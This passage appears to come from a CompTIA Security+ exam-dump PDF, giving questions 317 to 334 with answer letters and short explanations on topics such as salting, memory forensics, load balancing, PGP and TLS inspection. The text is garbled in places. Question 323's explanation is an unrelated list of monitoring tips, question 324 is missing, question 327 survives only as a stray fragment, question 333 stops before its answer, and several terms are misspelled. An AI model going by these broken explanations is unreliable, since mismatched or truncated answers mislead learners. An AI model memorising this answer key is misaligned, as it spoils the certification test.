Explanation:
MDM stands for Mobile Device Management, which is a solution that can be used to manage and secure
personal devices that access company data. MDM can enforce policies and rules, such as password
protection, encryption, remote wipe, device lock, application control, and more. MDM can help a
company enable BYOD (Bring Your Own Device) while protecting sensitive organizational information.
317.A company recently upgraded its authentication infrastructure and now has more computing power.
Which of the following should the company consider using to ensure user credentials are being
transmitted and stored more securely?
A. Blockchain
B. Salting
135 / 142
The safer , easier way to help you pass any IT exams.
C. Quantum
D. Digital signature
Answer: B
Explanation:
Salting is a technique that adds random data to user credentials before hashing them. This makes the
hashed credentials more secure and resistant to brute-force attacks or rainbow table attacks. Salting
also ensures that two users with the same password will have different hashed credentials.
A company that has more computing power can consider using salting to ensure user credentials are
being transmitted and stored more securely. Salting can increase the complexity and entropy of the
hashed credentials, making them harder to crack or reverse.
318.A digital forensics team at a large company is investigating a case in which malicious code was
downloaded over an HTTPS connection and was running in memory, but was never committed to disk.
Which of the following techniques should the team use to obtain a sample of the malware binary?
A. pcap reassembly
B. SSD snapshot
C. Image volatile memory
D. Extract from checksums
Answer: C
Explanation:
The best technique for the digital forensics team to use to obtain a sample of the malware binary is to
image volatile memory. Volatile memory imaging is a process of collecting a snapshot of the contents of
a computer's RAM, which can include active malware programs. According to the CompTIA Security+
SY0-601 Official Text Book, volatile memory imaging can be used to capture active malware programs
that are running in memory, but have not yet been committed to disk. This technique is especially useful
in cases where the malware is designed to self-destruct or erase itself from the disk after execution.
319.A security administrator Installed a new web server. The administrator did this to Increase the
capacity (or an application due to resource exhaustion on another server.
Which o( the following algorithms should the administrator use to split the number of the connections on
each server In half?
A. Weighted response
B. Round-robin
C. Least connection
D. Weighted least connection
Answer: B
Explanation:
The administrator should use a round-robin algorithm to split the number of connections on each server
in half. Round-robin is a load-balancing algorithm that distributes incoming requests to the available
servers one by one in a cyclical order. This helps to evenly distribute the load across all of the servers,
ensuring that no single server is overloaded.
320.Which of the following describes business units that purchase and implement scripting software
without approval from an organization's technology Support staff?
136 / 142
The safer , easier way to help you pass any IT exams.
A. Shadow IT
B. Hacktivist
C. Insider threat
D. script kiddie
Answer: A
Explanation:
shadow IT is the use of IT-related hardware or software by a department or individual without the
knowledge or approval of the IT or security group within the organization12. Shadow IT can encompass
cloud services, software, and hardware. The main area of concern today is the rapid adoption of cloud-
based services1.
According to one source3, shadow IT helps you know and identify which apps are being used and what
your risk level is. 80% of employees use non-sanctioned apps that no one has reviewed, and may not be
compliant with your security and compliance policies.
321.A company that provides an online streaming service made its customers' personal data including
names and email addresses publicly available in a cloud storage service. As a result, the company
experienced an increase m the number of requests to delete user accounts.
Which of the following best describes the consequence of tins data disclosure?
A. Regulatory tines
B. Reputation damage
C. Increased insurance costs
D. Financial loss
Answer: B
Explanation:
Reputation damage Short
Reputation damage is the loss of trust or credibility that a company suffers when its customers’ personal
data is exposed or breached. This can lead to customer dissatisfaction, loss of loyalty, and requests to
delete user accounts.
References: https://www.comptia.org/content/guides/what-is-cybersecurity
322.A security architect is working on an email solution that will send sensitive data. However, funds are
not currently available in the budget for building additional infrastructure.
Which of the following should the architect choose?
A. POP
B. IPSec
C. IMAP
D. PGP
Answer: D
Explanation:
PGP (Pretty Good Privacy) is a commonly used encryption method for email communications to secure
the sensitive data being sent. It allows for the encryption of the entire message or just the sensitive parts.
It would be an appropriate solution in this case as it doesn't require additional infrastructure to
implement.
137 / 142
The safer , easier way to help you pass any IT exams.
323.Which of the following can be used to detect a hacker who is stealing company data over port 80?
A. Web application scan
B. Threat intelligence
C. Log aggregation
D. Packet capture
Answer: D
Explanation:
✑ Using a SIEM tool to monitor network traffic in real-time and detect any anomalies or malicious
activities
✑ Monitoring all network protocols and ports to detect suspicious volumes of traffic or connections to
uncommon IP addresses
✑ Monitoring for outbound traffic patterns that indicate malware communication with command and
control servers, such as beaconing or DNS tunneling
✑ Using a CASB tool to control access to cloud resources and prevent data leaks or downloads
✑ Encrypting data at rest and in transit and enforcing strong authentication and authorization policies
325.A company was recently breached. Part of the company's new cybersecurity strategy is to centralize
the logs from all security devices.
Which of the following components forwards the logs to a central source?
A. Log enrichment
B. Log queue
C. Log parser
D. Log collector
Answer: D
Explanation:
A log collector can collect logs from various sources, such as servers, devices, applications, or network
components, and forward them to a central source for analysis and storage23.
138 / 142
The safer , easier way to help you pass any IT exams.
326.A systems analyst is responsible for generating a new digital forensics chain -of- custody form.
Which of the following should the analyst include in this documentation? (Select two).
A. The order of volatility
B. A forensics NDA
C. The provenance of the artifacts
D. The vendor's name
E. The date and time
F. A warning banner
Answer: C,E
Explanation:
A digital forensics chain-of-custody form is a document that records the chronological and logical
sequence of custody, control, transfer, analysis, and disposition of digital evidence.
A digital forensics chain-of-custody form should include the following information:
✑ The provenance of the artifacts: The provenance of the artifacts refers to the origin and history of the
digital evidence, such as where, when, how, and by whom it was collected, handled, analyzed, or
otherwise controlled.
✑ The date and time: The date and time refer to the specific moments when the digital evidence was
collected, handled, analyzed, transferred, or disposed of by each person involved in the chain of custody.
Other information that may be included in a digital forensics chain-of-custody form are:
✑ The identification of the artifacts: The identification of the artifacts refers to the unique identifiers or
labels assigned to the digital evidence, such as serial numbers, barcodes, hashes, or descriptions.
✑ The signatures of the custodians: The signatures of the custodians refer to the names and signatures
of each person who had custody or control of the digital evidence at any point in the chain of custody.
✑ The location of the artifacts: The location of the artifacts refers to the physical or logical places where
the digital evidence was stored or processed, such as a lab, a server, a cloud service, or a device.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://resources.infosecinstitute.com/topic/chain-of-custody-in-digital-forensics/
139 / 142
The safer , easier way to help you pass any IT exams.
information. The attacker may use this information to compromise the WordPress site or the users’
accounts.
328.Which ol the following is required in order (or an IDS and a WAF to be effective on HTTPS traffic?
A. Hashing
B. DNS sinkhole
C. TLS inspection
D. Data masking
Answer: C
Explanation:
TLS (Transport Layer Security) is a protocol that is used to encrypt data sent over HTTPS (Hypertext
Transfer Protocol Secure). In order for an intrusion detection system (IDS) and a web application firewall
(WAF) to be effective on HTTPS traffic, they must be able to inspect the encrypted traffic. TLS inspection
allows the IDS and WAF to decrypt and inspect the traffic, allowing them to detect any malicious activity.
References:
[1] CompTIA Security+ Study Guide Exam SY0-601 [1], Sixth Edition, Chapter 11, "Network Security
Monitoring"
[2] CompTIA Security+ Get Certified Get Ahead: SY0-501 Study Guide, Chapter 7, "Intrusion Detection
and Prevention"
329.A cybersecurity analyst needs to adopt controls to properly track and log user actions to an
individual.
Which of the following should the analyst implement?
A. Non-repudiation
B. Baseline configurations
C. MFA
D. DLP
Answer: A
Explanation:
Non-repudiation is the process of ensuring that a party involved in a transaction or communication
cannot deny their involvement. By implementing non-repudiation controls, a cybersecurity analyst can
properly track and log user actions, attributing them to a specific individual. This can be achieved through
methods such as digital signatures, timestamps, and secure logging mechanisms.
References:
1. CompTIA Security+ Certification Exam Objectives (SY0-601):
https://www.comptia.jp/pdf/CompTIA%20Security%2B%20SY0-601%20Exam%20Objectives.pdf
2. Stewart, J. M., Chapple, M., & Gibson,
D. (2021). CompTIA Security+ Study Guide: Exam SY0-601. John Wiley & Sons.
330.A company is enhancing the security of the wireless network and needs to ensure only employees
with a valid certificate can authenticate to the network.
Which of the following should the company implement?
A. PEAP
B. PSK
140 / 142
The safer , easier way to help you pass any IT exams.
C. WPA3
D. WPS
Answer: A
Explanation:
PEAP stands for Protected Extensible Authentication Protocol, which is a protocol that can provide
secure authentication for wireless networks. PEAP can use certificates to authenticate the server and the
client, or only the server. PEAP can also use other methods, such as passwords or tokens, to
authenticate the client. PEAP can ensure only employees with a valid certificate can authenticate to the
network.
331.A security analyst is reviewing packet capture data from a compromised host On the In the packet
capture. analyst locates packets that contain large of text,.
Which Of following is most likely installed on compromised host?
A. Keylogger
B. Spyware
C. Torjan
D. Ransomware
Answer: A
Explanation:
A keylogger is a type of malware that records the keystrokes of the user and sends them to a remote
attacker. The attacker can use the keystrokes to steal the user’s credentials, personal information, or
other sensitive data. A keylogger can generate packets that contain large amounts of text, as the packet
capture data shows.
332.Which of the following best describes the situation where a successfully onboarded employee who is
using a fingerprint reader is denied access at the company's mam gate?
A. Crossover error rate
B. False match raw
C. False rejection
D. False positive
Answer: C
Explanation:
False rejection Short
A false rejection occurs when a biometric system fails to recognize an authorized user and denies
access. This can happen due to poor quality of the biometric sample, environmental factors, or system
errors.
References: https://www.comptia.org/blog/what-is-biometrics
333.A corporate security team needs to secure the wireless perimeter of its physical facilities to ensure
only authorized users can access corporate resources.
Which of the following should the security team do? (Refer the answer from CompTIA SY0-601 Security+
documents or guide at comptia.org)
A. Identify rogue access points.
B. Check for channel overlaps.
141 / 142
The safer , easier way to help you pass any IT exams.
334.A security administrator needs to add fault tolerance and load balancing to the connection from the
file server to the backup storage.
Which of the following is the best choice to achieve this objective?
A. Multipathing
B. RAID
C. Segmentation
D. 8021.1
Answer: A
to achieve the objective of adding fault tolerance and load balancing to the connection from the file
server to the backup storage is multipathing1. Multipathing is a technique that allows a system to use
more than one path to access a storage device1. This can improve performance by distributing the
workload across multiple paths, and also provide fault tolerance by switching to an alternative path if one
path fails1. Multipathing can be implemented using software or hardware solutions1.
142 / 142